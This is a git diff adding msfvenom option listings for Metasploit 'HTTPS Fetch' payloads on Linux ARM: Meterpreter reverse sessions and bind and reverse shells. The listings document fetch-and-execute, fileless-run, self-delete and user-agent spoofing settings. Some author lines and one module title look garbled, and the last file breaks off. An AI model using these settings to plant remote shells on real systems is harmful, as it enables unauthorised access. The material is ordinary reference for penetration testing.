b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..40abca9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_http: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XDlRDyozw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..6978b83 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_https: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME yVuhXdmh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fdb3beb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_tcp: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MbCCNJBUC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell-bind_tcp.txt new file mode 100644 index 0000000..ed0ef24 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell-bind_tcp.txt @@ -0,0 +1,90 @@ + + Name: HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager + Module: payload/cmd/linux/https/armle/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ySPizMEJvcst no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + dup2 socket in r12, then execve. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell-reverse_tcp.txt new file mode 100644 index 0000000..470f15c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell-reverse_tcp.txt @@ -0,0 +1,98 @@ + + Name: HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/armle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME FmcwCXPI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + dup2 socket in r12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell_bind_tcp.txt new file mode 100644 index 0000000..0e19d07 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell_bind_tcp.txt @@ -0,0 +1,81 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/armle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BfDJWpoeNTIJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Connect to target and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell_reverse_tcp.txt new file mode 100644 index 0000000..645aeab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell_reverse_tcp.txt @@ -0,0 +1,87 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/armle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) 